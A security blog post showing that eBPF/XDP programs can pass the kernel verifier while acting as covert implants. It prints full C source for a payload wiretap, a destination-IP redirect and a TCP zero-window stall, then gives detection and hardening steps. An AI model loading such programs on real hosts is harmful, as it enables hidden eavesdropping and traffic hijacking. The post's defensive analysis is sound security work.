Verified, Not Safe: XDP Programs the Kernel Trusts
I wrote an XDP program last week. Attached it to eth0, loaded it with bpf_prog_load. The verifier walked every path through the bytecode, checked my bounds, checked my helper calls, and returned 0. Clean load.
I ran bpftool prog list and there it was—sitting alongside systemd's cgroup programs and the container runtime's socket filters. One more entry in a list of twenty. If you scrolled past it, you'd assume it was a monitoring tool. Some observability thing. It wasn't. It was copying the first 128 bytes of every TCP payload into a ring buffer.
The verifier didn't flag it. It couldn't. The verifier's job is to prove my program won't crash the kernel. It doesn't have an opinion about what I do with packet data once I've proven I'll access it safely.
All of this requires CAP_BPF or root. An attacker with root can already load kernel modules, ptrace processes, rewrite binaries. But BPF is different in one way: it looks normal. A kernel module shows up in lsmod. A modified binary fails a hash check. A BPF program sits in a list of twenty other BPF programs and looks identical to the one next to it.
I wanted to understand where the line actually is.
Four programs the verifier loves
All four compile with clang -O2 -target bpf. All four load cleanly.
Silent drop
XDP runs before the kernel allocates an sk_buff. Return XDP_DROP for packets matching a destination port: no socket buffer, no netfilter hook, nothing for tcpdump to see. I sent traffic to port 4443 and watched tcpdump. Nothing. Not a SYN, not a RST. The only evidence was ethtool -S counters—the NIC saw the packets, the kernel didn't.
Passive wiretap
The drop program was visible in one way: the connection failed. The client knew something was wrong. So I tried the opposite—what if traffic flows normally and I just watch?
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <arpa/inet.h>
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1 << 20); /* 1 MB */
} tap_rb SEC(".maps");
SEC("xdp")
int xdp_tap(struct xdp_md *ctx) {
void *data = (void *)(long)ctx->data;
void *data_end = (void *)(long)ctx->data_end;
struct ethhdr *eth = data;
if ((void *)(eth + 1) > data_end)
return XDP_PASS;
if (eth->h_proto != htons(ETH_P_IP))
return XDP_PASS;
struct iphdr *ip = (void *)(eth + 1);
if ((void *)(ip + 1) > data_end)
return XDP_PASS;
if (ip->protocol != IPPROTO_TCP)
return XDP_PASS;
__u32 ip_hlen = ip->ihl * 4;
struct tcphdr *tcp = (void *)ip + ip_hlen;
if ((void *)(tcp + 1) > data_end)
return XDP_PASS;
__u32 tcp_hlen = tcp->doff * 4;
void *payload = (void *)tcp + tcp_hlen;
if (payload >= data_end)
return XDP_PASS;
__u32 tcp_hdr_off = (void *)tcp - data;
__u32 pay_off = tcp_hdr_off + tcp_hlen;
if (pay_off + 128 > (__u32)(data_end - data))
return XDP_PASS;
void *buf = bpf_ringbuf_reserve(&tap_rb, 128, 0);
if (!buf)
return XDP_PASS;
bpf_xdp_load_bytes(ctx, pay_off, buf, 128);
bpf_ringbuf_submit(buf, 0);
return XDP_PASS;
}
This one returns XDP_PASS. Traffic flows normally. Nobody's connection breaks. But every TCP payload gets its first 128 bytes copied into a BPF_MAP_TYPE_RINGBUF before the kernel's network stack even touches it. A userspace process reads the ring buffer at its leisure.
I checked. ss didn't show it. lsof didn't show it. There's no file descriptor, no socket, no entry in /proc/net. The data path is entirely kernel-internal: XDP hook → ring buffer → mmap'd read. The only evidence is a map in bpftool map list that you'd have to think to look for.
Header rewrite
This is the one that surprised me. Not because it's complicated—because it's identical to legitimate infrastructure code.
I rewrote the destination IP, recomputed the checksum with the RFC 1624 incremental update, and called bpf_redirect to send the packet out a different interface.
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <arpa/inet.h>
#define ORIG_DST 0x0A000164 /* 10.0.1.100 */
#define NEW_DST 0x0A000265 /* 10.0.2.101 */
#define OUT_IFIDX 4
static __always_inline void
update_csum(__u16 *csum, __be32 old_val, __be32 new_val) {
__u32 s = (~(__u32)*csum & 0xFFFF)
+ (~((__u32)old_val >> 16) & 0xFFFF)
+ (~(__u32)old_val & 0xFFFF)
+ ((__u32)new_val >> 16)
+ ((__u32)new_val & 0xFFFF);
s = (s & 0xFFFF) + (s >> 16);
s = (s & 0xFFFF) + (s >> 16);
*csum = (__u16)~s;
}
SEC("xdp")
int xdp_redirect_rewrite(struct xdp_md *ctx) {
void *data = (void *)(long)ctx->data;
void *data_end = (void *)(long)ctx->data_end;
struct ethhdr *eth = data;
if ((void *)(eth + 1) > data_end)
return XDP_PASS;
if (eth->h_proto != htons(ETH_P_IP))
return XDP_PASS;
struct iphdr *ip = (void *)(eth + 1);
if ((void *)(ip + 1) > data_end)
return XDP_PASS;
if (ip->daddr != htonl(ORIG_DST))
return XDP_PASS;
__be32 old_dst = ip->daddr;
ip->daddr = htonl(NEW_DST);
update_csum(&ip->check, old_dst, ip->daddr);
return bpf_redirect(OUT_IFIDX, 0);
}
From the sender's side, everything looked normal. Packet left, ACK came back. From the original destination's side, the connection never happened. The packet showed up on a different interface, heading to a different host entirely.
If you diffed this against Cilium's XDP datapath or Facebook's Katran, the structure is the same. Parse headers, match a condition, rewrite an IP, update the checksum, redirect. The code that load-balances your production traffic and the code that silently reroutes it to an attacker's box use the same helpers, the same bounds checks, the same checksum fold. There is no syntactic tell.
TCP window zero
I didn't drop anything. I didn't redirect anything. I changed a single field: the TCP window size. Set it to zero on incoming ACKs from a target port. XDP runs on ingress—so when the server on port 8080 sends an ACK back, the XDP program rewrites its window field to zero before the local TCP stack reads it. The local application sees a zero window and enters persist mode per RFC 1122 §4.2.2.17, voluntarily stopping transmission. The connection stays open. No RST, no FIN. netstat shows ESTABLISHED. Everything looks healthy. The data just stops flowing.
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <arpa/inet.h>
#define TARGET_PORT 8080
static __always_inline void
update_tcp_csum(__u16 *csum, __u16 old_val, __u16 new_val) {
__u32 s = (~(__u32)*csum & 0xFFFF)
+ (~(__u32)old_val & 0xFFFF)
+ (__u32)new_val;
s = (s & 0xFFFF) + (s >> 16);
*csum = ~((__u16)s + (__u16)(s >> 16));
}
SEC("xdp")
int xdp_zero_window(struct xdp_md *ctx) {
void *data = (void *)(long)ctx->data;
void *data_end = (void *)(long)ctx->data_end;
struct ethhdr *eth = data;
if ((void *)(eth + 1) > data_end)
return XDP_PASS;
if (eth->h_proto != htons(ETH_P_IP))
return XDP_PASS;
struct iphdr *ip = (void *)(eth + 1);
if ((void *)(ip + 1) > data_end)
return XDP_PASS;
if (ip->protocol != IPPROTO_TCP)
return XDP_PASS;
struct tcphdr *tcp = (void *)ip + (ip->ihl * 4);
if ((void *)(tcp + 1) > data_end)
return XDP_PASS;
if (tcp->source != htons(TARGET_PORT))
return XDP_PASS;
if (!tcp->ack)
return XDP_PASS;
__u16 old_win = tcp->window;
tcp->window = 0;
update_tcp_csum(&tcp->check, old_win, 0);
return XDP_PASS;
}
The kernel's TCP stack doesn't know. XDP rewrote the incoming window field before the TCP code ever read it. The local side thinks the server's receive window is zero, so it stops sending. ss locally shows the send queue growing. Nobody dropped a packet. The connection is just frozen, waiting for a window update that arrives with the right value—but gets rewritten to zero again every time.
I sat there watching the send queue climb. A connection stall that's invisible to every standard diagnostic on both sides. No packet loss. No errors. Just a frozen pipe.
All four programs pass the verifier. All four are structurally identical to things you'd find in production—a load balancer rewrites headers, a firewall drops ports, a monitoring tool reads payloads, a traffic shaper adjusts windows. Same SEC("xdp"), same bounds checks, same helper calls. The only difference is what's on the other side of the ring buffer, or which IP address you're rewriting to, or why you picked that port number.
The haystack
After loading my wiretap program, I ran bpftool prog list to see what it looked like from the outside. I'd been testing on a Kubernetes node running Cilium, so there were already a lot of BPF programs loaded. This is what I saw:
$ bpftool prog list
6: cgroup_device tag a0d4b9c1d1f9 gpl
loaded_at 2026-05-12T08:31:02+0000 uid 0
xlated 504B jited 309B memlock 4096B
11: cgroup_skb tag 6deef7357e7b4530 gpl
loaded_at 2026-05-12T08:31:02+0000 uid 0
xlated 64B jited 54B memlock 4096B
12: cgroup_skb tag 6deef7357e7b4530 gpl
loaded_at 2026-05-12T08:31:02+0000 uid 0
xlated 64B jited 54B memlock 4096B
58: cgroup_device tag ee0e253c78993a24 gpl
loaded_at 2026-05-12T08:31:14+0000 uid 0
xlated 416B jited 255B memlock 4096B
173: xdp tag 8f06c7a58c442bc7 gpl
loaded_at 2026-05-12T08:32:01+0000 uid 0
xlated 1392B jited 788B memlock 4096B
map_ids 14,15
174: sched_cls tag 3bc7abe41cce68c5 gpl
loaded_at 2026-05-12T08:32:01+0000 uid 0
xlated 17968B jited 9728B memlock 20480B
map_ids 14,15,16,17
175: sched_cls tag 9a5b24def40c6967 gpl
loaded_at 2026-05-12T08:32:01+0000 uid 0
xlated 22120B jited 12043B memlock 24576B
map_ids 14,15,16,17,18
212: xdp tag 5a3c0f0c4a3d7e9b gpl
loaded_at 2026-05-12T09:14:33+0000 uid 0
xlated 864B jited 492B memlock 4096B
map_ids 21
340: cgroup_skb tag 6deef7357e7b4530 gpl
loaded_at 2026-05-12T08:33:19+0000 uid 0
xlated 64B jited 54B memlock 4096B
341: cgroup_skb tag 6deef7357e7b4530 gpl
loaded_at 2026-05-12T08:33:19+0000 uid 0
xlated 64B jited 54B memlock 4096B
389: cgroup_device tag a2b450ee44e80e5e gpl
loaded_at 2026-05-12T08:33:44+0000 uid 0
xlated 504B jited 309B memlock 4096B
415: sched_cls tag 7e21c72519aa452a gpl
loaded_at 2026-05-12T08:34:02+0000 uid 0
xlated 4200B jited 2311B memlock 4096B
map_ids 14,15,16
472: tracepoint tag b0f0e9ea03d4acba gpl
loaded_at 2026-05-12T08:35:11+0000 uid 0
xlated 1288B jited 703B memlock 4096B
map_ids 29
511: xdp tag e4f8c3a21d9b6f07 gpl
loaded_at 2026-05-12T10:41:57+0000 uid 0
xlated 712B jited 401B memlock 4096B
map_ids 34
My wiretap is one of those entries. Which one?
They all have the same fields: type, tag hash, bytecode size, map IDs. Nothing distinguishes the implant from the rest.
I tried bpftool net list—that at least shows which programs are attached to which interfaces:
$ bpftool net list
xdp:
eth0(2) driver id 173
veth7a3f(8) generic id 212
eth1(3) driver id 511
tc:
eth0(2) clsact/ingress bpf_lxc id 174 tag 3bc7abe41cce68c5
eth0(2) clsact/egress bpf_lxc id 175 tag 9a5b24def40c6967
Better. But legitimate XDP programs attach to interfaces too. Cilium's datapath is on eth0. A network policy enforcer lives on a veth. A traffic monitor sits on eth1. My wiretap is on one of these interfaces and it looks exactly like the others.
Reading the bytecode
The only real way to know what a program does is to read it. I dumped the bytecode of my wiretap. Click any instruction to see what it's doing:
If you know what you're looking at, the tells are there. But I had to know to look for those patterns. And I wrote the program. If I were looking at someone else's bytecode—one of thirty programs on a production node, each with hundreds of instructions—would I spot the bpf_ringbuf_reserve buried in a flow that looks like a standard packet filter?
It gets worse. bpftool prog dump jited id 212 gives you the JIT'd native x86 instead of BPF bytecode. Now you're reading mov and call instructions with hex addresses. Even less readable.
Most teams never look at any of this. The programs load, traffic flows, dashboards stay green.
Hardening
So what do you actually do about this?
kernel.unprivileged_bpf_disabled=1—the baseline. Default since kernel 5.16. Only CAP_BPF or root can load programs. If you're running anything older, set it now. Doesn't solve the problem described above, but shrinks the surface.
BPF LSM hooks—this is the more interesting one. Linux 5.7+ lets you write BPF programs that gate other BPF programs. You attach a policy to the bpf LSM hook that checks program type, attach target, or the calling process before allowing bpf_prog_load. SELinux and AppArmor both have BPF policy support. So you can say "only Cilium's binary, signed by this key, can load XDP programs on eth0." Everything else gets rejected at load time.
Signed BPF programs—there's been work toward loading programs signed against a keyring, where the loader checks the signature before the verifier even runs. Not fully mainlined yet, but it's the direction things are heading.
Baseline diffing—the simplest approach, and probably the most underused. Snapshot what's loaded, compare periodically:
# snapshot loaded programs
bpftool prog list --json > /var/log/bpf-baseline.json
# snapshot interface attachments
bpftool net list --json >> /var/log/bpf-baseline.json
# diff against previous snapshot
diff <(jq -S . /var/log/bpf-baseline.json) \
<(bpftool prog list --json | jq -S .)
| Detection command | What it reveals |
|---|---|
bpftool prog list | All loaded programs, type, size, maps |
bpftool net list | XDP and TC attachments per interface |
bpftool prog dump xlated id N | BPF bytecode disassembly |
bpftool prog dump jited id N | Native x86/ARM assembly |
bpftool map list | All maps—look for unexpected ringbufs |
sysctl kernel.unprivileged_bpf_disabled | Whether unprivileged users can load BPF |
ausearch -k bpf | Audit log of BPF syscalls (if auditing enabled) |
None of these tell you what a program does. They tell you what's loaded. That gap—between knowing what's present and knowing what it's doing—is the whole problem.
Reading: